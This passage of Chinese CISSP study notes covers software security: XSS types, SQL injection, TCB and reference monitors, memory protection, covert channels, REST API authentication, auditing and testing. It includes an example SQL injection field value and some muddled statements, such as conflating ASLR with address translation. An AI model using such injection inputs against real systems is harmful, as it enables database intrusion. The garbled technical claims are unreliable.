漏洞。如果系统管理员取消了某个特殊的权限,那么这个限 制只有在用户下次登录时才会起作用。如果在用户登录的时候正好发生取消访问许可权限的操 作,那么用户是否能够访问资源就是不确定的。用户只需保留会话打开数天之久,新的限制就 永远不会被应用。 —250— 对策:系统应当使用原子操作;操作系统可以使用软件锁。 3.跨站脚本攻击(XSS) Cross-Site Scripting(必考!) 术语“跨站点脚本(Cross-Site Scripting,XSS)”指的是利用一个 Web 站点的脆弱性, 在 Web 应用程序中注入恶意代码的攻击。攻击者(用客户端脚本语言,如 JavaScript)把他们 的恶意代码注入到网页中。随后,不知情的用户在访问这个站点时,恶意代码就会在他们的浏 览器中执行,这样可能会导致 Cookies 被盗、会话被劫持、恶意代码被执行和访问控制被绕 过,或者有助于利用浏览器的错落性。XSS 攻击的关键在于将恶意代码写入 Web 站点。一般是 在一个有返回结果的表单网页里,输入带<SCRIPT>标记的字段,服务器收到表单内容就会运行 里面的恶意代码了。XSS 有三种类型: ①非永久/非持久性 XSS (NonpersistentXSS),也叫反映漏洞/反射脆弱性,出现在攻击 者欺骗受害者处理一个用流氓脚本来编程的 URL,从而偷取受害者敏感信息(cookie,会话 ID 等)的时候。这个攻击的原理是利用动态网站上缺少适当的输入或者输出确证。(就是返回一 个有恶意代码的 URL 给用户点击) ②永久/持久性 XSS(PersistentXSS),也叫二阶漏洞,也称为存储或者第二顺序脆弱性, 通常针对的是那些让用户输入存储在数据库或其他任何地方(如论坛、留言板、意见簿等)的数 据的网站。攻击者张贴一些包含恶意 JavaScript 的文本,在其他用户浏览这些帖子时,它们 的浏览器会呈现这个页面并执行攻击者的 JavaScript。(就是把恶意代码存入网站) ③基于文档对象模型/DOM 型(Document Object Model based XSS )。也叫本地跨站点脚 本。DOM 是标准结构布局,代表着浏览器中的 HTML 和 XML。在这样的攻击中,像表单字段和 cookie 这样的文档组件可以通过 JavaScript 被引用。攻击者利用 DOM 环境来修改最初的客户 端 JavaScript。这使受害者的浏览器执行由此而导致的 JavaScript 代码。 4. SQL 注入攻击 Injection(必考!) SQL 注入攻击比 XSS 更加危险,它同样是向 Web 应用程序输入带特殊字符的表单字段,只 是它的目的不是欺骗用户,而是访问数据库。在动态网页中,经常会让用户输入附录密码、查 询关键字等表单内容,然后发送给数据库进行查询或比对。如果把输入的字段加一些特殊字符, 就可以让 SQL 语言执行额外的操作,从而进入数据库。比如:正解的输入密码是“123456”; 要想注入就输入“123456';XXXXX WHERE 'a' = 'a”,那么数据库会执行 2 条正常的 SQL 语 言了。 可以通过下列三种技术来防范: ①执行输入验证。与跨站脚本攻击的防御方法一样,输入验证操作能够限制用户在表单中 输入的数据类型。 ②限制用户特权。Web 服务器使用的数据库账户应当具有尽可能最小的权限。 ③利用数据库存储过程来限制应用程序执行任意代码的能力。存储过程就是:SQL 语句已 经编写并封装好了,驻留在数据库服务器,仅可由数据库管理员修改;Web 应用程序则调用各 种现成的存储过程来运行,不直接通过 SQL 语句来访问数据库。 5.侦察攻击/网络侦察扫描 Reconnaissance Attacks 目的就是找 IP、端口和漏洞。搞渗透测试必须技能,工具软件一大堆,著名的有 Nmap、 Nessus,OpenVAS 什么的,应该都玩过。 —251— 6.伪装攻击 Masquerading Attacks ①IP 欺骗 IP Spoofing 很简单,防范方法是在每个网络的边缘配置过滤程序,确保数据包满足以下标准: *内部 IP 地址的包不能从外网进入。 *外部 IP 地址的包不能从内网出去。 *私有 IP 地址的包不能过路由器。 ②会话劫持 Session Hijacking 会话劫持攻击指的是攻击者中途拦截己授权用户与资源之间的通信数据,然后使用劫持技 术接管这个会话并伪装成己授权用户的身份。如: *捕获客户端与服务器之间身份验证的详细信息,并使用这些信息伪装成客户端的身份。 *欺骗客户端,使其认为攻击者的系统是与之通信的服务器,并在客户端与服务器建立合 法连接的时候作为中间人(代理),断开服务器与客户端的连接。 *使用没有正常关闭连接的用户的 cookie 数据访问 Web 应用程序。 7.内存重用(客体重用) 内存被重新分配后,要清空被覆写。 其它还有:陷门/后门/维护钩子等,好多。 五、软件保护机制(必考) 1.可信计算基 将安全内核和引用监视器关联在一起的术语是可信计算基(TCB)。TCB 是计算机系统内所 有硬件,软件和固件的集合(组合体),它包含了该系统负责支持安全策略和对象隔离的所有 元素。当 TCB 被启用后,该系统被认为具有可信路径并带有可信 shell。可信路径是在用户或 程序与 TCB 之间的通信信道。TCB 负责提供需要的保护机制确保可信路径不能以任何方式受到 破坏。可信 shell 意味着任何 shell 或通信信道内发生的活动,与信道隔离并且不能由不可行 方或实体,无论是从内部还是外部进行交互。 TCB 的特性有: *实施主体对客体的安全访问功能; *抗篡改的性质; *易于分析与测试的结构; *安全保护能力主要取决于 TCB; *基于 TPM 实现机密性,不管可用性。 ①引用监视器 Reference Monitro 引用监控器/基准监视器,是一个抽象概念,但也可能有一个引用验证器,它通常运行在 安全内核的内部并负责执行对对象的安全访问检查,操作权限,和生成任何的安全审计结果消 息。换句话说,引用监控器被认为是一个抽象机器,其调解或控制,主体(用户)对客体(数据 或资源)的所有访问。引用监控器采取行动以保证任何主体试图访问任何客体都要有适当的权 限这样做,以便保护客体不受不良角色未授权访问的企图。安全内核真正地实现了引用监控器 的概念。 —252— 引用监视器的任务: 根据访问控制数据库,对主体对客体的访问请示做出是否允许的裁决,并将该请示记录到 审计数据库中。注意:引用监视器有动态维护访问控制库的能力。 引用监视器的特性: 执行主体到对象所有访问的抽象的机器; 必须执行所有验证策略,能够在修改中被保护,能够恢复正常,并且总是被调用; 处理所有主体到客体抽象机。 引用监视器必须满足的 3 个条件: 隔离、完整性、可验证。 You need Isolation, because it can’t be of public access, the less access the better. It must have a sense of completeness to provide the whole information and process cycles. It must be veriable, to provide security, audit and accounting functions. ②安全内核 Security Kernel 负责实施系统安全策略的软件和硬件的组合体。 安全内核是由所有的 TCB(软件,硬件,和固件)组件构成且它负责建立和执行引用监控器。 安全内核负责执行安全策略。它是一个引用监控器机制严格的实现。内核操作系统的架构通常 是分层的,并且内核应该在最低且最原始的水平。它是操作系统的一小部分,所有对信息的引 用和所有授权的改变都必须通过它执行。内核实现根据安全策略建立的对象之间的访问控制和 信息流控制。为了安全,内核必须满足 RM 三个基本条件(和引用监控器的要求一样): *完整性:所有对信息的访问,必须经过内核 *隔离:内核本身必须防止任何类型的未授权访问 *可验证性:内核必须被证明符合设计规范 TCB 中使用的产品的安全能力可以通过各种评价标准进行验证,如较早的可信计算机系统 评价标准(TCSEC)和当前的通用准则标准。 ③处理器特权状态 处理器特权状态保护处理器和它执行的活动。最早的实现的方法是在一个寄存器中记录处 理器的状态,只有当处理器在特权状态下操作时才能改变它。像 I/O 之类的指令请求被设计为 包含一个对这个寄存器的引用。如果寄存器不是在特权状态,指令就被终止。例如,intel 处 理器防止对系统代码和数据的覆盖,尽管这些保护很少被直接使用。特权机制应防止从较低特 权到更高特权的内存访问(程序或数据),但只有当控制被调用且在软件中适当地管理时。特权 级别通常参考环结构。为了说明这一点,许多操作系统使用两种处理器的访问模式: *用户模式(或进程、问题、程序) *内核模式(或特权、监管) 用户应用程序代码运行在用户模式,并且操作系统代码运行在内核模式。特权的处理器模 式被称为内核模式。内核模式允许处理器访问所有的系统内存,资源,和 CPU 指令。 应用程序代码应在非特权模式(用户模式)运行并且有一个受限的可用接口,受限的系统数 据访问,并且不能直接访问硬件资源。操作系统有比应用软件更高的特权级的一个优点是出问 —253— 题的应用软件不能破坏系统的运作。当一个用户模式的程序调用系统服务(例如从存储中读一 个文档),处理器缓存这个调用并将这个调用请求切换到内核模式。当这个调用完成后,操作 系统把调用切换回用户模式,并允许用户模式程序继续运行。在最高安全操作策略下,操作系 统和设备驱动程序运行在 0 环级,也称为内核级或系统级特权。在这个特权级,程序可以做什 么没用限制。因为在这个级别的程序访问不受限制,用户应该关注包含敏感信息的机器上设备 驱动程序的来源。应用和服务应该工作在环 3 级,也被称为用户级或应用级特权。需要注意的 是,如果一个这个级别上的应用或服务失败,一个捕获屏幕将出现(也称为一般性保护错误), 其可以被关闭且操作系统并不关心。把服务和常规的应用运行在相同特权级的决定是基于这样 的思想,如果服务被捕获,操作系统应该继续操作。 ④缓冲区溢出的安全控制 不当的边界检查导致恶意输入到程序;必须由程序员更正或直接打系统内补丁。所以,输 入的参数必须要检查合规,操作系统也要提供缓冲区管理机制,如进程隔离和内存保护。 另一个与特权状态相关的问题被称为无效的参数检查,这导致了缓冲区溢出。一个缓冲区 是由对程序的输入不正确(或缺乏)边界检查造成的。本质上,程序未能发现给一个分配的内存 空间的数据是否太多。因为当程序运行的时候被加载到内存,当溢出发生时,数据必须去某些 地方。如果那些数据恰好是被加载的可执行恶意代码,它可以像那个程序一样运行,或对运行 环境做出其他改变,其可被攻击者利用。缓冲区溢出必须由程序员或通过直接打内存补丁修正。 它们可以被检测到并修正,通过逆向过程(反汇编程序)并检查应用的操作。硬件状态和其它硬 件控制能使缓冲区溢出变得不可能,虽然企业很少指定此级别的硬件。边界强制和正确的错误 检查也将停止缓冲区。 ⑤中断 可以实现进程隔离。计算机内的进程必须互相隔离的需求必须被管理,以确保它有效地和 全面地发生,没有例外。操作系统就是这样的程序,它的执行确保进程隔离发生并且它与 CPU 共同通过中断和时间分片的使用来执行进程隔离。中断的使用允许操作系统确保一个进程被给 予充足的访问 CPU 的时间,当需要执行它所需的功能时,但它也确保进程不会停留过久的欢迎 且锁定其它进程的执行需要的资源。 中断是单片机实时地更紧密地处理外部事件的一种内部机制。“没有中断就没有操作系 统”。中断处理的时刻一定是在一条指令执行结束,转入下一操作时(准备处理另一个程序了)。 中断的处理:发现中断请求,指令控制器中止正在运行的程序,保存该程序的运行现场(当前 状态);根据中断信号从待定位置启动中断处理程序(操作系统提供)处理中断;处理完了恢 复前面的程序或者处理下一个中断请求。中断的产生:各种软硬件的中断信号。 为了执行进程隔离的概念,操作系统可以使用以下任何一种方式: *对象封装,可隐蔽其内部工作流程和数据。 *共享资源的时分复用,允许操作系统,以提供结构化的访问需要根据一个严格管理的时 间表使用资源的进程。 *命名区分,每进程被分配唯一的标识即进程 ID,或 PID。 *虚拟地址映射,不直接访问物理内存。 ⑥内存管理器 —254— 最重要的就是运用上面讲的虚拟地址映射。 它是操作系统用来跟踪不同类型的内存是如何被使用,分配和释放进程运行需要的不同类 型的内存,强制访问控制以确保进程只能与它们自己的内存段交互,并在需要时,管理 RAM 中 的内存内容交换到硬盘。有五个职责: *重定位:当需要时,在 RAM 和硬盘之间移动或交换内容并给应用提供指针,如果它们的 信息己经被移动到内存中的不同位置。 *保护:提供内存段的访问控制并且限制应用只能与分配给它们的内存段交互。 *共享:使用共享内存段,允许有不同访问级别的多个用户与一个应用或进程交互,同时 在进程之间运行和执行完整性和机密性控制。 *逻辑组织:所有类型的内存分段管理,在一个抽象的水平提供一个寻址方案,并允许共 享像 DLL 程序那样的软件模块。 *物理组织:为了分配内存,分段所有的物理内存空间。 内存管理过程还有一个附加部分需要讨论,即寄存器的使用。寄存器允许操作系统确认一 个进程只能与内存管理器分配给它的已定义的内存段交互。CPU 使用两种类型的寄存器来识别 内存地址: *一个基寄存器用来标识分配给进程的开始地址 *一个限制寄存器用来标识分配给进程的结束地址或信息破坏。 一个 CPU 将创建一个或多个线程来执行一个进程。线程是进程产生的一组指令的集合,以 运行它执行其被要求执行的特定活动。CPU 使用线程以允许进程执行动作,通过引用需要执行 的指令和数据驻留在内存中的地址。CPU 将地址与基和限制寄存器进行比较,以确保进程请求 的访问在分配给进程的允许的内存空间之内,而不是之外或在一些其它被保护的内存空间。内 存保护关注对主内存的访问控制。当几个进程在同时运行时,需要保护一个进程的内存防止被 另一个进程未授权访问。因此,必须对内存进行分段,以确保进程的本地内存不会相互干扰且 确保公共内存区域不受未授权访问。这个扩展超越了运行在主计算机内存中的应用:操作系统 可以使用辅助内存(存储设备),给出一个较大的主内存池的假象,或者它可以将主内存在用户 间分区,这样每个用户都看到一个内存比真实机器上的内存小的虚拟机。这种情况下可能需要 一些额外的控制。 ⑦内存保护方法(考点) 有四种方法来提供内存保护,这样没有用户进程可以无意地或故意地破坏另外一个进程的 地址空间或操作系统本身。 *第一种方法,确保由内核模式系统组件使用的所有系统范围内的数据结构和内存池,只 能在内核模式下访问。因此,用户模式的请求不能访问这些内存页。如果他们试图这样做,硬 件将产生一个错误,随后内存管理器将产生一个访问冲突。在早期的 Windows 操作系统中,例 如 Windows 95 和 Windows, 98,系统地址空间中的某些页可以由用户模式写入,从而使一个 错误的应用程序破坏关键的系统数据结果并导致系统崩溃。一个硬件抽象层(HAL)的实现以及 改进的内存管理技术己经消除了此问题,其结果是,由于这个原因,更近的基于 Windows 的操 作系统不会遇到这种相同类型的行为,例如桌面系统中的 Windows 7 和 8 以及服务器方面的 Windows Senver2008 和 2012。(确保所有的全系统的数据结构和存储器所使用的内核模式系 —255— 统组件池可以访问公在内核模式。) *在第二个方法中,每个进程有一个单独,私有的地址空间被保护不受属于其它进程的请 求的访问,也有极少数例外。每次当一个请求引用一个地址时,虚拟内存硬件,与内存管理器 一起,干预和转换这个虚拟地址到物理地址。这种控制机制被称为地址空间布局随机化(ASLR)。 ASLR 在很多操作系统平台实现,并允许内存管理器有效的改变,或随机的,进程使用的内存 地址空间地址,其在一个连续的基础上执行。因为像 Windows 7, Windows 8/8.1,和 OpenBSD 这样的操作系统,控制虚拟地址如何转换,一个进程中运行的请求不会不恰当地访问一个属于 另外一个进程的页面。(第个过程有一个单独的,专用地址空间从属于另一个任何请示被访问 受保护过程中,有少数例外。) *在第三种方法中,大多数现代处理器提供某些形式的硬件或软件控制的内存保护,例如 读或写访问。虽然这种保护机制的实现根据制造商所有不同,它通常被称为数据执行保护 (DEP)。提供的保护的类型取决于处理器。例如,一个内存保护选项是 PAGE_NOACCESS。在这 个区域,一个读取,写入,或执行代码的试图,就会发生访问冲突。DEP 有使某些系统内存区 域对进程的执行不可用的能力,通过标记它们为不可用来实现。这有双重好处,减少由内存管 理器管理的可用内存区域,同时减少可以提供给一个进程在其内执行的可用内存区域。这允许 操作系统进一步优化性能,加快交易速度,以及减少攻击者为了执行攻击可以获取访问的可用 内存空间。(大多数现代处理器提供某种形式的硬件或软件控制的存储器保护功能,如读或写 访问。) *第四种保护机制使用访问控制列表来保护共享内存对象,当进程试图打开它们的时候, 强制它们接受安全检查。另外一种安全功能涉及映射文件的访问。为了映射一个文件,执行请 求的客体(或用户)必须至少有对底层文件对象的读取访问权限,否则操作将失败。(使用访问 列表来保护共享内存对象,迫使他们接受安全检查时,流程试图打开它们。) ⑧隐蔽信道控制(必考) 隐蔽信道或约束问题是一个没有被安全措施控制的信息流。它是一个通信渠道,允许两个 合作的进程,以一种违反系统安全策略的方式,传递信息。即使存在保护机制,如果未授权信 息用信号机制或其它对象进行传递,那么一个隐蔽信道就可能存在。在应用安全中使用的标准 例子是这样一个情景,一个进程可以被一个程序启动或停止,这个进程的存在可以被另一个应 用检测到。这样,这个进程的存在可以用于,随着时间的推移,发出信号信息。唯一要关注的 信道是违反安全策略的那些;并不必关注那些与合法通信路径并行的信道。虽然每一类隐蔽信 道都有区别,但有一个共同的条件:通过通道发送和接收的对象必须能访问共享资源: *第一步是识别任何潜在的隐蔽信道; *第二步是分析这些信道以确定一个信道是否真实地存在; *接下来的步骤是基于人工检查和适当的测试技术,以验证信道是否创建了安全关注。 ⑨编程语言支持 提供程序安全执行的另一个方法是使用一个更安全的编程语言(也被称为强类型),比如 Java。类型安全的语言或安全语言是一个程序,它永远不会在某些方面出错。确保数组在边界 之内,指针总是有效的,并且代码不能违背变量的类型(例如把代码放在字符串中,然后执行 它)。从安全的角度看,没有指针很重要。通过指针访问内存是导致 C 或 C++程序漏洞(错误) —256— 和安全问题的一个主要原因。Java 在内部执行了检查,称为静态类型检查,它检查是否一个 操作在执行的时候获得的参数的类型始终正确。 强类型就是编程的语言必须满足高标准的规范要求,如果不是,则被称为弱类型。 B.3 配置管理(CM)作为安全编码的一个方面 对于软件,配置管理(CM)是指监控和管理对程序和文档的变更。 目标是保证完整性,可用性,和所有系统组件的正确版本的使用,例如软件代码,设计文 档,文档,和控制文件。配置管理涉及对系统所做的每一个变更。这包括所有变更的控制,核 查,和审计。 *第一步是确定所做的所有变更。 *控制当对某些类型的文档的所有变更发生时,必须被评审且由授权人员进行批准。 *核查是记录和报告通过任何变更流程对软件或硬件的配置。 *审计允许完成的变更被验证,尤其是确保任何变更不会影响已经建立的安全策略或保护 机制。还有变更计划管理和信息保护管理就不说了。 1.配置管理的类型: ①并发管理(concurrency management):确保多人从同一库中导出的文件是完全一致的。 ②版本管理(versioning):记录、跟踪、保持文件的各个版本,支持回滚。 ③同步控制(synchronization ):在工作需要时同步库中的所有或部分版本。 2.配置管理的过程: ①识别(Identification):识别并记录每个配置项的功能和物理牲。 ②控制((Control):控制对配置项的变更,从软件库发布配置项的版本。 ③状态记录(Status Accounting):记录变更的处理过程。 ④审计(Audit):控制配置管理过程的质量。 3.软件托管 Software Escrow(考点) 在第七域 F.2 章节讲过了。软件托管协议 Software Escrow Arrangements 是一种特殊的 工具,可以对公司起到保护作用:它避免公司受软件开发商的代码故障的影响,以便为产品提 供足够的支持,还可以防止出现由于开发商破产而造成产品失去技术支持的情况。在软件托管 协议下,开发商将应用程序源代码的副本提供给独立的第三方组织机构。然后,第三方用安全 的方式维护源代码副本备份的更新。这个经常考到,就是要找一个监理人来监督第三方的软件 开发。如果软件开发商倒闭了,我还要用它的源代码里,只能找第三方来要了。 最知名的软件代码托管网站:GitHub。 B.4 代码仓库的安全 软件开发是一个庞大团队的高度协同工作的复杂工程。Github、Bitbucket、和SourceForge 等代码仓库 Code Repositories(有的是开源仓库),可以用作软件代码的核心集中存储,提 供版本控制、缺陷跟踪、网站托管、发布管理、通信等功能,以支持软件开发。 1.API keys 公共基础设施和 IaaS 服务提供商都提供了 API 接口来定制和使用基础服务。当然,这些 —257— 服务是收费的,用于创建服务器的 API key 绑定服务器到一个特定的用户帐户(和信用卡)。如 果开发人员编写代码,包括了 API keys ,然后上传到一个公共的代码仓库,你的收费服务很 可能被黑客利用。 2.GitHub 的安全措施活动 GitHub 是很重要的代码管理系统(托管),它提供的安全措施有: ①物理安全,数据中心的访问仅限于数据中的技术人员和批准的 GitHub 员工,有严格的 访问控制和审计。 ②系统安全,系统有完善的安防系统,使用加固、打过补丁的操作系统;专用的防火墙和 VPN 服务;专用的入侵检测;分布式拒绝服务(DDoS)攻击缓解服务等。 ③运行安全,所有敏感信息、的安全文档销毁策略;完全文档化的变更管理流程。 ④软件安全,我们在 GitHub 聘请了一个 24/7/365 服务器专家团队。 ⑤通讯,所有和 GitHub 交换的私有数据总是通过 SSL 传输,通过 SSH 认证。 ⑥文件系统和备份,每一行代码至少保存在三个不同的服务器上,包括异地备份。 ⑦员工访问,没有任何 GitHub 员工可以访问过私有代码库除。 ⑧维护安全,使用速度限制来防范暴力攻击,使用双因素认证。 ⑨信用卡安全,不存储任何卡片的信息。 B.5 应用程序编码接口的安全 API 的安全问题主要涉及: 用户认证、用户授权、加密、防止未经授权的访问、问责制和审计。 分层方法是最经典的安全控制方法,互联网访问经常用到,一般分三层: 表示层、业务逻辑层、数据层。 不过数据库管理系统本身提供的安全特性,因为使用了中间层(中间件),而丢失、无效。 业务逻辑层建立的是“虚表”。因为有“中间件”,本身就保护了对数据库的攻击。 1.应用编程接口 API/ Application Programming Interfaces 为了使这些跨站点/跨系统的软件功能正常工作,每套独立软件都要提供应用编程接口, 允许程序开发人员通过函数调用来直接与底层服务进行交互。应用编程接口是物联网(IoT)的 连接器,允许我们的设备可以互相通讯。与此同时,然而,API 是互联网“未知的,看不见的 力量”,因为最终用户并不知道它们的存在。然而,API 无处不在。API 必须被管理和保护。 2.表述性状态转移(REST)representational state transfer API(考点) REST 是通过 URL 路径元素表达系统中的特定实体的方法;REST 不是一个架构,但它是在 Web 上建立服务的一个架构风格。REST 允许通过简化的 URL 与一个基于 Web 的系统交互,而不 是复杂的请求体或 POST 参数从系统请求特定项。对于涉及 API 安全的安全专业人员来说,广 泛使用的 REST API 才是真正的关键挑战的核心。今天无处不在使用 REST API。关于 web 服务, 符合 REST 约束的 API 称为 REST 风格(RESTful)。 3.基于 REST API 安全建议(建议性的东西都不用细读,一般不考的) ①使用与你的组织部署的任何 web 应用一样的安全机制部署你的 API;例如,如果你是在 web 前端过滤 XSS,你也必须为你的 API 这样做,最好用同样的工具。 —258— ②不要创建和实现你自己的安全解决方案。使用框架或现有的库,其已经过同行评审和测 试。不熟悉设计安全系统的开发者经常产生有缺陷的安全实现,当他们试图自己做的时候,结 果他们使他们的 API 容易受到攻击(记住 Tesla 讨论)。 ③除非你的 API 是免费的,只读的公开的 API,不要使用单一的基于键的认证。这是不够 的。你应该添加一个密码要求。 ④不要传递未加密的静态密钥。如果你正在使用 HTTP 且通过线路发送,那么请确保你始 终加密它。 ⑤理想的情况下,使用基于散列的消息验证码(HMAC),因为它是最安全的。使用 SHA-2 和 以上;避免用 SHA 和 MD5 因为已知的漏洞和弱点。 4.认证选项 就是实现 REST 安全的 3 种方法,有三种主要方式你需要熟悉: ①基本身份认证 w/TLS。基本身份认证是三个其中最早建立的,因为大多数情况下它可以 在没有额外库下实现。实现基本身份认证需要做的所有事情通常己经包含在你的标准框架或语 言库中。基本身份认证的问题是它是基本的,并且它只提供了可用的通用协议最低级别的安全 选项。没有高级选项使用此协议,所以你只是发送一个 Base64 编码的用户名和密码。如果没 有使用传输层安全协议(TLS)。决不能使用基本身份认证,因为用户名和密码的组合可以很容 易的被解码。 ②Oauthl.0。是这三个中最常见的协议。该协议使用一个加密签名(通常是 HMAC-SHA 值, 它组合了令牌秘密,随机数,和其它基于请求的信息。OAuth 1 巨大的优势是你从不直接通过 线路传递令牌秘密,从而彻底消除了可能有人看到传输中的密码。这是三个协议中唯一可以在 没有 SSL 下安全使用的协议,如果传输的是敏感数据,你还应该使用 SSL。不过,这个安全级 别是有代价的:产生和验证签名可能是个复杂的过程。你必须按照严格的步骤,使用特定的散 列算法。这实际上己经不是问题,因为每一个主流编程语言都已经提供了库为你处理这些。 ③Oauth2.0。现行规范中删除了签名,所以你不再需要使用加密算法来创建、产生和验证 签名。所有的这些加密现在都是由 TLS 处理,这是必须的。Oauth2 的库没有 Oauthl.0a 的库 那么多,所有集成这个协议到你的 API 可能更具挑战。 B.1 章节讲单点登陆时也提到了 Oauth,它可以用于单点登陆。 此外,像密钥管理互操作系统(KMIP)V1.1 这样的解决方案;客户端证书和 rHTTP 摘要也 可作为创建安全方案的的可能选项来查看。 5.OWASP REST 安全备忘单 当检查基于 REST API 安全需求和关注时,另外一个资源可以考虑的是 OWASP REST 安全备 忘单。一个安全备忘单例子是: RESTful web 服务应使用基于会话的身份认证,通过一个 POST 建立一个会话令牌或使用 一个 API 密钥作为 POST 体的参数或作为 cookie。用户名和密码,会话令牌,和 API 密钥不应 出现在 URL 中,因为这可能在 web 服务器日志中捕获并使它们内在的有价值。 6.Web 服务的通信 面向服务的软件架构 SOA 常被考到,相关的技术协议都要了解。 ①SOAP 简单对象访问协议(Sirrple Object Access Protocol) —259— 用来描述传递信息的格式。SOAP 是交换数据的一种协议,是一种轻量的、简单的、基于 XML 的协议,用于在 WEB 上交换结构化的和固化的信息。可以和许多因特网协议和格式结合使 用,包括超文本传输协议(HTTP),简单邮件传输协议(SMTP),多用途网际邮件扩充协议(MIME) 等。它还支持从消息系统到远程过程调用(RPC)等大量的应用程序。SOAP 使用基于 XML 的数据 结构和超文本传输协议HTTP的组合定义了一个标准的方法来使用Internet上各种不同操作环 境中的分布式对象。 ④Web 服务描述语言 WSDL(Web Services Description Language) 用来描述如何访问具体的接口。 ②统一描述 UDDI(Universal Description, Discovery and Integration) 用来管理、分发、查询 web service。 ③XML(Extensible Markup Language),不说了。 ④HTTP,不说了。 C.评估软件安全的有效性 1.认证与认可 前面讲过很多次了。 认证是指技术评估或评价信息系统在它们的操作环境中的安全合规性:用户和管理者的背 书,系统/应用符合他们的功能需求,并且在大多数情况下,背书的独立的验证。 认可或授权过程审查认证(或评价)信息,并授予官方的授权将信息系统投入操作使用:它 是高级管理人员的正式批准。 2.风险管理框架 传统的认证和认可的过程已经转变为一个六个步骤的风险管理框架(RMF)。 风险管理过程改变了传统 C&A 的焦点,从一个静态的,过程性的活动变为更加动态的方法, 提供了更加高效地管理信息系统相关的安全风险的能力,在一个高度多样化的环境:复杂和尖 端的网络威胁,日益增加的系统漏洞,和快速变化的任务。 C.1 审计和日志的变更 1.日志 日志是己经发生在计算机系统上的行为和事件的记录。 *提供了一个清晰的视图:谁拥有一个进程,发起了什么行为,什么时候发起的,该行为 在哪儿发生的,以及为什么进程执行。 *主记录是系统和网络的活动的保管者。 *对抓住解释,发生了什么以及为什么在事件中安全控制失效了的相关的信息非常有帮助。 2.审计 为了企业的最佳利益,应有适当的审计策略存在,有效地以日志的形式收集关于网络和系 统中发生的关键事件的信息,并适当的管理它们。这些信息、是关于事件的,以日志的形式获 得,将使所有感兴趣的各方,例如高层管理人员以及网络和系统管理员,去了解和评估: *建立基线的需要 —260— *不同服务器和系统的性能 *应用的功能和操作问题 *有效的检测入侵企图 *取证分析 *遵守各项法律法规 3.信息的完整性,准确性,和审计 *信息的完整性:应该使用流程来比较或调和处理了什么和什么应该被处理。例如,控制 可以比较总和或检查序列号。这将检查是否对正确的数据执行了正确的操作。 *信息准确性:为了检查输入的准确性,数据确认和验证检查应纳入相应的应用。字符检 查比较输入的字符串和期待的字符类型,例如数字或字母。有时也称为合理性检查。范围检查 验证输入的数据与预定义的上限和下限。关系检查比较输入数据与主记录文件中的数据。合理 性检查比较输入数据与一个预期的标准,合理性检查的另一种形式。交易限额检查输入数据与 行政上对特定交易设定的最高限额。 *信息审计很重要,因为漏洞存在于软件的生命周期中;攻击会就有发生的可能性。审计 过程协助检测任何异常行为。一个安全信息系统必须提供一个授权人员,有能力审计任何行为, 其可能潜在地引起访问,破坏,或以某种方式影响敏感信息的发布。 审计的水平和类型取决于己安装软件的审计要求和数据的敏感性,其在系统中处理和存 储。关键因素是审计数据提供了发生了什么类型的未授权活动和谁或什么进程执行了这个活动 的信息。 C.2 风险分析与缓解 1.基础知识 风险的内容还是看第一域吧。 风险:具有发生的可能性并对发生风险的项目有一个正面或负面的影响的一个事件。一个 风险可能有一个或多个原因,并且如果发生时,造成一个或多个影响。 风险管理:是一个持续的过程,贯穿项目的生命周期。它包括风险管理规划,识别,分析, 监控,和控制的过程。在任何时候一旦新的风险被识别,很多的以上这些过程在项目生命周期 中会被更新。风险管理的目标是减少对项目负面的事件发生的可能性和影响。另一方面,任何 可能有正面影啊的应该加以利用。 风险识别:一般都是在项目之前启动的,在项目的生命周期中,随着项目成熟风险的数目 也在增加。当一个风险被识别后,它将首先被评沽发生的可能性,对进度,范围,成本,和质 量影 An 的程度,然后进行优先级排序。 优先级:风险事件可能影啊一个或多个影响类型。风险优先级的分配基于: *发生的可能性 *影响类别的数量 *它们对项目影响的程度(高,中,低) 记录风险:所有识别的风险应该进入一个风险登记册并作为风险声明的一部分记录。作为 记录风险的一部分,另外两个重要项需要解决: —261— *第一是可用于减轻事件发生的可能性的减缓步骤 *第二是应急计划,在事件发生前或发生时应该采取的一系列的活动 减缓和应急计划:减缓行动经常需要成本。有时减缓风险的成本可能超过假定风险和产生 的后果。在决定建立一个应急计划前,针对减缓策略的成本评估每个风险的可能性和影响是非 常重要的。风险发生前实施的应急计划是防范活动,旨在降低影响或完全消除风险。风险发生 后实施的应急计划通常只能减轻影响。 2.最佳实践 这些通用的最佳实践包括以下: ①使用变更控制过程。 ②阅读所有相关文档。 ③测试。服务包和补丁程序在部署到生产之前,必须在有代表性的非生产环境进行测试。 ④有一个工作备份和生产停机时间计划。 ⑤必须有回退计划。允许系统和企业返回到失败的实施之前的状态。 ⑥预警服务台和关键用户组。 ⑦首先瞄准非关键服务器:如果所有的测试在实验室环境中都成功,先从非关键服务器开 始部署,如果可能的话,然后在服务包已经在生产环境运行 10-14 天后,再向主服务器部署。 3.风险管理工具 包括石川图(因果图),P-图,初步危害分析/预先危险分析(PHA),失效模式与影响分析 (FMEA, Failure Modes and Effect Analysis),故障模式、影响及危害性分析(FMECA),危害 分析与关键控制点(HACCP)等等。 C.3 测试与验证 作为开发过程的一部分,在分发任何软件之前必须彻底测试它。 测试和验证是不同的,测试是发现问题;验证相关于审计,是确认问题被解决了。 1.三种测试方法: ①白盒测试:要检查一个程序的内部逻辑结构和一行行的代码,分析程序中潜在的错误。 ②黑盒测试:从用户的角度提供输入场景并检查输出,只验功能不看代码。 ③灰盒测试:灰盒测试结合了两种方法,是流行的软件验证方法。 2.两种类型测试: ①静态测试:分析源代码或编译后的应用程序,并运行它。一般用工具软件查缓冲区溢出。 ②动态测试:在运行环境中评估软件,是正式部署前的唯一、必然测试手段。 另一种分类方法: ①盲目/单盲测试:评估人员只能利用公开可用的数据,而网管人员将知道有这种测试。 ②双盲测试/隐蔽评估:评估人员只能利用公开可用的数据,网管和安管不知道有测试。 双盲测试能够评估网络的安全级别以及员工的响应能力、日志监控和上报流程,从而更加现实 地说明了发起某种攻击的成功或失败几率。 3.软件功能测试的类型: ①单元测试(Unit testing):验证受控环境中的单个组件的数据结构、逻辑以及边界条件。 —262— ②集成测试(Integration testing):验证组件是否按照设计规范中那样协同工作。 ③验收测试(Acceptance testing):确保代码满足客户需求。 ④回归测试(Regression testing):系统变更后重新测试确保其功能性能以及安全达标。 4.软件安全测试的类型: ①模糊测试(Fuzzing testing):发送复杂/随机的数据给软件来引起软件的错误,主要用 于识别缓存溢出、DOS、注入、验证错误以及其他可能导致软件死机、崩溃或发生各种错误。 ②脆弱性扫描(Vulnerability scaning):通过自动化工具检查程序的主要错误,如强类 